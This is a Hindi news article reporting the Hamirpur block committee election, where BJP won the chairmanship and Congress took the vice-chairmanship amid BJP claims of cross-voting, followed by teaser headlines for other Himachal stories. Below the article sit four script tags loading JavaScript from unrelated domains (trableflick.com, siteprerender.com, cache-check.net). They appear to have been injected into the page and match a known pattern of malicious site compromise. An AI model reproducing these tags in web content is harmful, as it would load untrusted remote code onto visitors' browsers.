<p>हमीरपुर ब्लॉक समिति में अध्यक्ष और उपाध्यक्ष का चुनाव संपन्न हो गया है। जिसमें हमीरपुर ब्लॉक समिति के अध्यक्ष और उपाध्यक्ष पद के लिये चुनाव करवाया गया। चुनाव में बीजेपी के हरीश शर्मा ने अध्यक्ष पर जीत हासिल की वहीं उपाध्यक्ष के पद पर कांग्रेस के संजीव शर्मा ने बाजी मारी। आपको बता दें कि चुनाव से पहले बीजेपी ब्लॉक समिति के अध्यक्ष और उपाध्यक्ष पद पर जीत हासिल करने का दावा कर रही थी। लेकिन जब वोटिंग करवाई गई तो बीजेपी ने अपना उपाध्यक्ष का पद खो दिया। बीजेपी का कहना है कि क्रॉस वोटिंग के चलते उन्होंने उपाध्यक्ष का पद खोया है। वहीं, कांग्रेस उपाध्यक्ष के पद पर जीत हासिल करने पर जश्न मना रही है। हमीरपुर के विधायक नरेंद्र ठाकुर उपाध्यक्ष का पद खोने पर जांच करने की बात कह रहे हैं।</p>
<p>वहीं, नव निर्वाचित हमीरपुर ब्लॉक समिति के अध्यक्ष हरीश शर्मा ने कहा 15 सदस्यों में से 9 वोट मेरे पक्ष में डाले गए हैं। जिस कारण जीत हासिल हुई है। हरीश शर्मा ने सभी लोगों का आभार जताया है जिन्होंने उनके पक्ष में वोट डाले है। आगमी दिनों में बेहतर काम करने का दावा भी किया है। ब्लॉक के सभी कार्यों का प्रमुखता से किया जाएगा। इसके बाद हमीरपुर ब्लॉक समिति के नव निर्वाचित उपाध्यक्ष संजीव शर्मा ने अपनी जीत का श्रेय कांग्रेस पार्टी के वरिष्ठ नेताओं को दिया है। जीत के लिए सभी लोगों का आभार जताया है।</p>
<p>वहीं, उपाध्यक्ष के पद पर जीत हासिल करने केलिए कांग्रेस जिलाध्यक्ष राजेंद्र जार ने संजीव शर्मा को बधाई दी। उन्होंने कहा कि कांग्रेस की सरकार न होने के बाबजूद भी उन्होंने बीजेपी को उपाध्यक्ष के पद पर पटखनी दी है। जो कांग्रेस पार्टी के लिए बड़ी जीत है। इसके बाद हमीरपुर बीजेपी के विधायक नरेंद्र ठाकुर ने उपाध्यक्ष का पद गवाने बाद कहा सुबह पार्टी कार्यालय में बीजेपी के आठ और एक अन्य ने समर्थन देंने की बात की थी। लेकिन उपाध्यक्ष पद पर क्रोस वोटिंग हुई है जिसकी बैठकर जांच की जाएगी। भाजपा विधायक नरेंद्र ठाकुर ने कहा कि बीजेपी के अन्दर अंतर कलह नहीं है। पंचायती राज चुनाव पार्टी सिंबल पर नही होते है। इसमें वही जीत हासिल करता है जो अपने जनाधार के लिए जाना जाता है। </p>
<p><img src=”/media/gallery/images/image(2196).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1611997574214″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…
Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…
Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…
टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…
वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…
Shimla: रोहडू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…